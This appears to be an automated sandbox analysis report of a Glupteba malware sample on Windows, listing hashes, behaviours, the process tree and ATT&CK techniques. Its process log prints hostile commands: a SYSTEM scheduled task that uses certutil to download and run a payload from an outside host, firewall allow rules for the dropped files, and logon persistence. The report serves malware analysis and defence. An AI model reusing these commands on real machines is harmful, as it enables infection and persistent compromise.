Analysis

  • max time kernel
    161s
  • max time network
    174s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 18:47

General

  • Target

    3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0.exe

  • Size

    3.8MB

  • MD5

    4b8194037614dd1235559cbe9e762100

  • SHA1

    ce33f1da25022c65579232f6e308d48f26a3a9f8

  • SHA256

    3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0

  • SHA512

    ac5cf533a6496b6cb3af9931a2635b63e3b5facb235d9fa2319c250748928fb294433f29680d2784a708f5a6930183d46d52c1ec7f8f7cd298ee4916b2b566e7

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0.exe
    "C:\Users\Admin\AppData\Local\Temp\3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2856
    • C:\Users\Admin\AppData\Local\Temp\3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0.exe
      "C:\Users\Admin\AppData\Local\Temp\3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4208
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3804
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:376
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3752
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
            4⤵
              PID:3940
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:796
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:312
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://10gamestop.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:3828
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:888
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:4976
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 736
            3⤵
            • Program crash
            PID:4512
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 628
          2⤵
          • Program crash
          PID:2560
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4240
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2856 -ip 2856
        1⤵
          PID:4852
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4208 -ip 4208
          1⤵
            PID:4564

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Defense Evasion

          Modify Registry

          2
          T1112

          Install Root Certificate

          1
          T1130

          Discovery

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            Filesize

            1.7MB

            MD5

            13aaafe14eb60d6a718230e82c671d57

            SHA1

            e039dd924d12f264521b8e689426fb7ca95a0a7b

            SHA256

            f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

            SHA512

            ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

          • C:\Windows\rss\csrss.exe
            Filesize

            3.8MB

            MD5

            4b8194037614dd1235559cbe9e762100

            SHA1

            ce33f1da25022c65579232f6e308d48f26a3a9f8

            SHA256

            3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0

            SHA512

            ac5cf533a6496b6cb3af9931a2635b63e3b5facb235d9fa2319c250748928fb294433f29680d2784a708f5a6930183d46d52c1ec7f8f7cd298ee4916b2b566e7

          • C:\Windows\rss\csrss.exe
            Filesize

            3.8MB

            MD5

            4b8194037614dd1235559cbe9e762100

            SHA1

            ce33f1da25022c65579232f6e308d48f26a3a9f8

            SHA256

            3ce6347b28007263c9a903af4916f2630de6d882774bdb9e81eaeb368d7284f0

            SHA512

            ac5cf533a6496b6cb3af9931a2635b63e3b5facb235d9fa2319c250748928fb294433f29680d2784a708f5a6930183d46d52c1ec7f8f7cd298ee4916b2b566e7

          • memory/312-145-0x0000000000000000-mapping.dmp
          • memory/376-135-0x0000000000000000-mapping.dmp
          • memory/796-140-0x0000000000000000-mapping.dmp
          • memory/796-144-0x0000000000400000-0x000000000318A000-memory.dmp
            Filesize

            45.5MB

          • memory/796-143-0x0000000003C00000-0x0000000003FA7000-memory.dmp
            Filesize

            3.7MB

          • memory/888-147-0x0000000000000000-mapping.dmp
          • memory/2856-132-0x0000000000400000-0x000000000318A000-memory.dmp
            Filesize

            45.5MB

          • memory/2856-130-0x0000000003862000-0x0000000003C09000-memory.dmp
            Filesize

            3.7MB

          • memory/2856-131-0x0000000003C10000-0x0000000004306000-memory.dmp
            Filesize

            7.0MB

          • memory/3752-137-0x0000000000000000-mapping.dmp
          • memory/3804-134-0x0000000000000000-mapping.dmp
          • memory/3828-146-0x0000000000000000-mapping.dmp
          • memory/3940-138-0x0000000000000000-mapping.dmp
          • memory/4208-133-0x0000000000000000-mapping.dmp
          • memory/4208-139-0x0000000000400000-0x000000000318A000-memory.dmp
            Filesize

            45.5MB

          • memory/4208-136-0x00000000037B7000-0x0000000003B5E000-memory.dmp
            Filesize

            3.7MB

          • memory/4976-149-0x0000000000000000-mapping.dmp